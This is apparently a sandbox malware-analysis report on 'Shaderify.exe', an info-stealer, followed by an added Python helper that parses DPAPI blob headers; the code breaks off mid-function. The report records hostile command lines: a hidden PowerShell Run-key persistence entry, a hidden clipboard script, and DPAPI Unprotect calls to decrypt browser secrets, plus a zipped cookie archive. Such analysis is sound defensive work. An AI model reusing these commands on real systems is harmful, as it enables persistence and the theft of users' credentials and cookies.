"C:\Users\Admin\AppData\Local\Temp\Shaderify.exe" --type=gpu-process --field-trial-handle=1188,13637512085350316135,4677928392725463459,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1204 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\Shaderify.exe
"C:\Users\Admin\AppData\Local\Temp\Shaderify.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1188,13637512085350316135,4677928392725463459,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1616 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\Shaderify.exe
"C:\Users\Admin\AppData\Local\Temp\Shaderify.exe" --type=gpu-process --field-trial-handle=1188,13637512085350316135,4677928392725463459,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1344 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | shaderify.xyz | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
Files
\Users\Admin\AppData\Local\Temp\da0c7e02-143d-474d-9be6-e6dcff0d74cf.tmp.node
| MD5 | 56192831a7f808874207ba593f464415 |
| SHA1 | e0c18c72a62692d856da1f8988b0bc9c8088d2aa |
| SHA256 | 6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c |
| SHA512 | c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33 |
memory/2700-10-0x000000001B530000-0x000000001B812000-memory.dmp
memory/2700-11-0x0000000002910000-0x0000000002918000-memory.dmp
C:\ProgramData\edge\Updater\Get-Clipboard.ps1
| MD5 | 52cc110bb3777aa6bba7900630d4eb49 |
| SHA1 | 3663dc658fd13d407e49781d1a5c2aa203c252fc |
| SHA256 | 892a9edb03db3fd88fecc1e1a2f56a7339f16f6734e8d77e6538ea2c8c9026d6 |
| SHA512 | 89b80d2783e902d68ffd08b6f3fb1848ae6e6c4bf2d7a1e4afdac970b2ee6ffcc58116cdd6234e3d6278eb9413d36aafe62b5beca24a0846575d12af0c5112ab |
\??\c:\Users\Admin\AppData\Local\Temp\yiuunn7z.cmdline
| MD5 | b853a11392267add066748e37bd1059a |
| SHA1 | 983ca4dc4c5595e7bb36a414c3c4c33705012960 |
| SHA256 | 8af06cd156b7867f5c4ddb4f322ae3a5084be22b0a9a8e00dbecdfc5dd128cef |
| SHA512 | 7d27480eea222c77ada289c64f698665d5a5d4f3f0e615ff89f4d016d85c4ab0b92edddaa326f2e82a635a5fca3485439f84be9c026d34946b57dd753b674cd1 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | d78164ff249c6a75248c9e658466420d |
| SHA1 | fe9e1fc05cd06434260139842c92827fea96a863 |
| SHA256 | bf447616c34c1e62f7b4f3bac2e45ea3cd7c5722a2346c7df4a1c1fad26b1919 |
| SHA512 | f1f980254587c92a1b529812f669a65584557d47f002ae5d90db35c01389a61f288e04a11db6051b2df1fd30d3b0cae6a09a7e5ef00483932c757015fe879fd5 |
\??\c:\Users\Admin\AppData\Local\Temp\yiuunn7z.0.cs
| MD5 | b462a7b0998b386a2047c941506f7c1b |
| SHA1 | 61e8aa007164305a51fa2f1cebaf3f8e60a6a59f |
| SHA256 | a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35 |
| SHA512 | eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020 |
C:\Users\Admin\AppData\Local\Temp\yiuunn7z.dll
| MD5 | c887ac1198786b51fe161467b14552db |
| SHA1 | c7d640d9c53167b66aa899e147f67ed58510f964 |
| SHA256 | 6ea1c0338fee8cfab6c1adef2cd047266a35248c1baeebc6e57697f103012cf2 |
| SHA512 | 9b430bc0b0884f618e9eeb07b326bfc0d4811c9b99b86f54850360474de1b0fb534d9137c996b24276bb49d9e30260a36b1ae7abc281acc8cc8a900bf75406fa |
C:\Users\Admin\AppData\Local\Temp\RES148B.tmp
| MD5 | be5c1091f833d25c9bb9521b87a39b18 |
| SHA1 | 06e3edef9a37957b2584477e1adecea89e35b972 |
| SHA256 | 6174c5ae01b7bd0372fe3dd2f2d135dcb8dca09e6584ccc800027fec6f34a5f3 |
| SHA512 | ee3c87d4d3d935e51acd7cf9bb845971085851b3a596c3f53f1c8bb15d55c2d6ec9308ba697ad1991cf3160a4df21ad2fce1bc4a958ea051c4554b66a2fd0e77 |
C:\Users\Admin\AppData\Local\Temp\yiuunn7z.pdb
| MD5 | 960b7e688c1122b39ae7806ef397e71c |
| SHA1 | f12583e1dc984f2bc8fe9524615a5fe6d8bbf3ca |
| SHA256 | b2c4cbf77c2f05d2957e784c2196254b989e238477c06828b5f20ebdd2187ef3 |
| SHA512 | a398381fb41f1493e3bfd4d622ae74f9c0253f45b0e2a1a3456c6fa843c361a908ad5190842e34c9718631a989fa69ded76963b960b8ff83fa4e686b494125c0 |
memory/2700-33-0x0000000002B60000-0x0000000002B68000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\CSC148A.tmp
| MD5 | 2caf5b867d97fde2fb204a44ea96597b |
| SHA1 | fb0871744ef7c0d68f3b89f451396f815a25efb1 |
| SHA256 | 3432356fa8d820d3f2e6c406617ff23c435878e6bdee9f811d1350e848723dd9 |
| SHA512 | 9ecd7be3370f1b7db63d542e897f03966ca8233f3f343cddb7798b79ec04c2e92f014cd326a62c357dd7fbead66400b0f5667a0ecf509aa6642a2aef1d62cfe7 |
memory/2436-75-0x0000000076E80000-0x0000000076E81000-memory.dmp
memory/2436-43-0x0000000000060000-0x0000000000061000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Admincookies.zip
| MD5 | 76cdb2bad9582d23c1f6f4d868218d6c |
| SHA1 | b04f3ee8f5e43fa3b162981b50bb72fe1acabb33 |
| SHA256 | 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85 |
| SHA512 | 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f |
Analysis: behavioral15
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win10v2004-20240508-en
Max time kernel
131s
Max time network
154s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3740,i,3724086843943218842,1026644135694712596,262144 --variations-seed-version --mojo-platform-channel-handle=3888 /prefetch:8
Network
Files
Analysis: behavioral30
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win7-20240215-en
Max time kernel
117s
Max time network
119s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsis7z.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 224
Network
Files
Analysis: behavioral23
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win10v2004-20240426-en
Max time kernel
149s
Max time network
156s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\swiftshader\libEGL.dll,#1
Network
Files
Analysis: behavioral27
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:50
Platform
win10v2004-20240508-en
Max time kernel
148s
Max time network
154s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\vk_swiftshader.dll,#1
Network
Files
Analysis: behavioral20
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win7-20240221-en
Max time kernel
117s
Max time network
127s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe
"C:\Users\Admin\AppData\Local\Temp\resources\elevate.exe"
Network
Files
Analysis: behavioral22
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win7-20240508-en
Max time kernel
118s
Max time network
123s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\swiftshader\libEGL.dll,#1
Network
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win10v2004-20240426-en
Max time kernel
135s
Max time network
155s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\d3dcompiler_47.dll,#1
Network
Files
Analysis: behavioral16
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win7-20240221-en
Max time kernel
120s
Max time network
128s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2512 wrote to memory of 1716 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libGLESv2.dll,#1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2512 -s 88
Network
Files
Analysis: behavioral24
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win7-20240508-en
Max time kernel
117s
Max time network
122s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\swiftshader\libGLESv2.dll,#1
Network
Files
Analysis: behavioral25
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win10v2004-20240508-en
Max time kernel
131s
Max time network
154s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\swiftshader\libGLESv2.dll,#1
Network
Files
Analysis: behavioral28
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win7-20240221-en
Max time kernel
117s
Max time network
132s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1540 wrote to memory of 2024 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\vulkan-1.dll,#1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1540 -s 92
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:50
Platform
win10v2004-20240426-en
Max time kernel
148s
Max time network
152s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3636 wrote to memory of 4636 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4636 -ip 4636
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 612
Network
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win10v2004-20240508-en
Max time kernel
148s
Max time network
159s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Shaderify.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaderify.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Roaming\\VTOizUgHSvlseoy.ps1\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaderify.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaderify.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaderify.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaderify.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaderify.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shaderify.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Shaderify.exe
"C:\Users\Admin\AppData\Local\Temp\Shaderify.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gvzwrytg\gvzwrytg.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5D91.tmp" "c:\Users\Admin\AppData\Local\Temp\gvzwrytg\CSC560CAE5A71D24B2D88A8B8609B673FC9.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,34,250,209,79,219,135,79,142,220,79,126,12,193,145,62,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,141,247,97,18,0,223,25,105,159,95,1,13,45,223,226,244,76,155,218,204,185,9,81,102,32,42,219,93,217,210,20,229,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,22,135,125,102,183,6,14,93,69,8,241,27,19,68,141,0,52,65,125,34,2,169,120,13,12,139,71,183,106,227,160,96,48,0,0,0,53,194,236,4,4,15,128,129,74,75,108,75,254,138,31,104,162,74,131,235,190,140,141,225,165,187,255,143,230,9,24,141,75,152,31,49,159,25,200,114,235,221,10,94,100,162,164,91,64,0,0,0,160,2,159,108,227,0,139,100,90,190,144,91,160,16,0,118,0,237,223,39,21,94,23,207,116,182,141,19,207,134,155,38,28,244,48,159,24,116,68,156,9,108,110,206,16,97,118,23,190,47,18,79,251,223,252,102,63,250,246,142,53,220,95,173), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,34,250,209,79,219,135,79,142,220,79,126,12,193,145,62,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,141,247,97,18,0,223,25,105,159,95,1,13,45,223,226,244,76,155,218,204,185,9,81,102,32,42,219,93,217,210,20,229,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,22,135,125,102,183,6,14,93,69,8,241,27,19,68,141,0,52,65,125,34,2,169,120,13,12,139,71,183,106,227,160,96,48,0,0,0,53,194,236,4,4,15,128,129,74,75,108,75,254,138,31,104,162,74,131,235,190,140,141,225,165,187,255,143,230,9,24,141,75,152,31,49,159,25,200,114,235,221,10,94,100,162,164,91,64,0,0,0,160,2,159,108,227,0,139,100,90,190,144,91,160,16,0,118,0,237,223,39,21,94,23,207,116,182,141,19,207,134,155,38,28,244,48,159,24,116,68,156,9,108,110,206,16,97,118,23,190,47,18,79,251,223,252,102,63,250,246,142,53,220,95,173), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,34,250,209,79,219,135,79,142,220,79,126,12,193,145,62,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,122,186,59,106,159,138,3,96,16,128,17,122,8,139,244,254,106,175,103,37,20,249,57,194,158,27,178,137,187,116,192,25,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,51,236,46,156,240,143,65,80,220,246,189,52,39,90,104,221,208,87,182,76,56,254,202,35,90,104,4,211,157,136,246,34,48,0,0,0,236,136,210,242,56,175,158,131,62,105,152,134,63,166,243,205,78,109,3,103,229,75,107,28,226,76,68,224,129,151,35,136,155,178,159,173,136,168,183,248,130,255,73,20,171,117,100,54,64,0,0,0,105,122,195,241,66,118,127,24,231,89,139,64,153,192,36,27,119,201,84,191,71,217,202,229,245,17,171,106,172,111,14,159,154,23,121,146,201,140,245,239,210,69,138,85,51,152,9,20,64,9,10,136,255,245,250,138,57,107,104,198,95,38,18,158), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,34,250,209,79,219,135,79,142,220,79,126,12,193,145,62,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,122,186,59,106,159,138,3,96,16,128,17,122,8,139,244,254,106,175,103,37,20,249,57,194,158,27,178,137,187,116,192,25,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,51,236,46,156,240,143,65,80,220,246,189,52,39,90,104,221,208,87,182,76,56,254,202,35,90,104,4,211,157,136,246,34,48,0,0,0,236,136,210,242,56,175,158,131,62,105,152,134,63,166,243,205,78,109,3,103,229,75,107,28,226,76,68,224,129,151,35,136,155,178,159,173,136,168,183,248,130,255,73,20,171,117,100,54,64,0,0,0,105,122,195,241,66,118,127,24,231,89,139,64,153,192,36,27,119,201,84,191,71,217,202,229,245,17,171,106,172,111,14,159,154,23,121,146,201,140,245,239,210,69,138,85,51,152,9,20,64,9,10,136,255,245,250,138,57,107,104,198,95,38,18,158), $null, 'CurrentUser')
C:\Users\Admin\AppData\Local\Temp\Shaderify.exe
"C:\Users\Admin\AppData\Local\Temp\Shaderify.exe" --type=gpu-process --field-trial-handle=1500,12723749145653602269,8771074544358891808,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1824 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\Shaderify.exe
"C:\Users\Admin\AppData\Local\Temp\Shaderify.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1500,12723749145653602269,8771074544358891808,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2184 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\Shaderify.exe
"C:\Users\Admin\AppData\Local\Temp\Shaderify.exe" --type=gpu-process --field-trial-handle=1500,12723749145653602269,8771074544358891808,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1744 /prefetch:2
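The two cmd.exe -> powershell.exe pairs above pass a byte array straight into System.Security.Cryptography.ProtectedData::Unprotect with the 'CurrentUser' scope. Those arrays are DPAPI (CryptProtectData) blobs, which is what a stealer has to decrypt to reach a Chromium-based browser's protected data, consistent with the "Reads user/profile data of web browsers" signature and the Admincookies.zip artifact below. The following is an added triage helper, not code from this report or from the sandbox vendor: it pulls the [byte[]]@(...) literal out of a command line and walks the documented DPAPI blob header (version, provider GUID, master key GUID, flags, description, algorithm IDs and section lengths) without attempting any decryption. SAMPLE_CMDLINE is the second powershell.exe command line from the process list above, copied verbatim; the function names and the ALG_ID lookup table are this example's own.

```python
import re
import struct
import uuid

# Every CryptProtectData blob carries this provider GUID right after its version field.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")

# CryptoAPI ALG_IDs seen in DPAPI blobs; anything else is reported as a hex value.
ALG_IDS = {
    0x6603: "CALG_3DES",
    0x660E: "CALG_AES_128",
    0x6610: "CALG_AES_256",
    0x8004: "CALG_SHA1",
    0x800C: "CALG_SHA_256",
    0x800E: "CALG_SHA_512",
}

# Second powershell.exe command line from this report's process listing (copied as-is).
SAMPLE_CMDLINE = (
    "powershell.exe Add-Type -AssemblyName System.Security; "
    "[System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@("
    "1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,"
    "35,34,250,209,79,219,135,79,142,220,79,126,12,193,145,62,16,0,0,0,10,0,0,0,"
    "69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,122,186,59,106,159,"
    "138,3,96,16,128,17,122,8,139,244,254,106,175,103,37,20,249,57,194,158,27,"
    "178,137,187,116,192,25,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,51,236,46,156,"
    "240,143,65,80,220,246,189,52,39,90,104,221,208,87,182,76,56,254,202,35,90,"
    "104,4,211,157,136,246,34,48,0,0,0,236,136,210,242,56,175,158,131,62,105,"
    "152,134,63,166,243,205,78,109,3,103,229,75,107,28,226,76,68,224,129,151,35,"
    "136,155,178,159,173,136,168,183,248,130,255,73,20,171,117,100,54,64,0,0,0,"
    "105,122,195,241,66,118,127,24,231,89,139,64,153,192,36,27,119,201,84,191,"
    "71,217,202,229,245,17,171,106,172,111,14,159,154,23,121,146,201,140,245,"
    "239,210,69,138,85,51,152,9,20,64,9,10,136,255,245,250,138,57,107,104,198,"
    "95,38,18,158), $null, 'CurrentUser')"
)


def extract_byte_array(cmdline: str) -> bytes:
    """Return the bytes of the first PowerShell [byte[]]@(...) literal in a command line."""
    m = re.search(r"\[byte\[\]\]\s*@\(([\d,\s]+)\)", cmdline)
    if not m:
        raise ValueError("no [byte[]]@(...) literal found")
    return bytes(int(n) for n in re.findall(r"\d+", m.group(1)))


class _Reader:
    """Little-endian cursor over a blob; raises instead of silently reading past the end."""

    def __init__(self, data: bytes):
        self.data, self.pos = data, 0

    def take(self, n: int) -> bytes:
        chunk = self.data[self.pos:self.pos + n]
        if len(chunk) != n:
            raise ValueError("truncated DPAPI blob")
        self.pos += n
        return chunk

    def u32(self) -> int:
        return struct.unpack("<I", self.take(4))[0]

    def guid(self) -> str:
        return str(uuid.UUID(bytes_le=self.take(16)))


def parse_dpapi_blob(blob: bytes) -> dict:
    """Walk the CryptProtectData blob header and return its metadata (no decryption)."""
    r = _Reader(blob)
    version = r.u32()
    provider = r.guid()
    if version != 1 or provider != str(DPAPI_PROVIDER_GUID):
        raise ValueError("not a DPAPI CryptProtectData blob")
    mk_version = r.u32()
    master_key = r.guid()          # names the master key file under %APPDATA%\Microsoft\Protect\<SID>\
    flags = r.u32()
    description = r.take(r.u32()).decode("utf-16-le").rstrip("\x00")
    alg_crypt, key_bits = r.u32(), r.u32()
    salt = r.take(r.u32())
    hmac_key = r.take(r.u32())     # "strong" HMAC key; normally empty
    alg_hash, hash_bits = r.u32(), r.u32()
    hmac_salt = r.take(r.u32())
    data = r.take(r.u32())
    sign = r.take(r.u32())
    if r.pos != len(blob):
        raise ValueError("trailing bytes after DPAPI blob")
    return {
        "version": version, "provider_guid": provider,
        "master_key_version": mk_version, "master_key_guid": master_key,
        "flags": flags, "description": description,
        "alg_crypt": ALG_IDS.get(alg_crypt, hex(alg_crypt)), "key_bits": key_bits,
        "salt_len": len(salt), "hmac_key_len": len(hmac_key),
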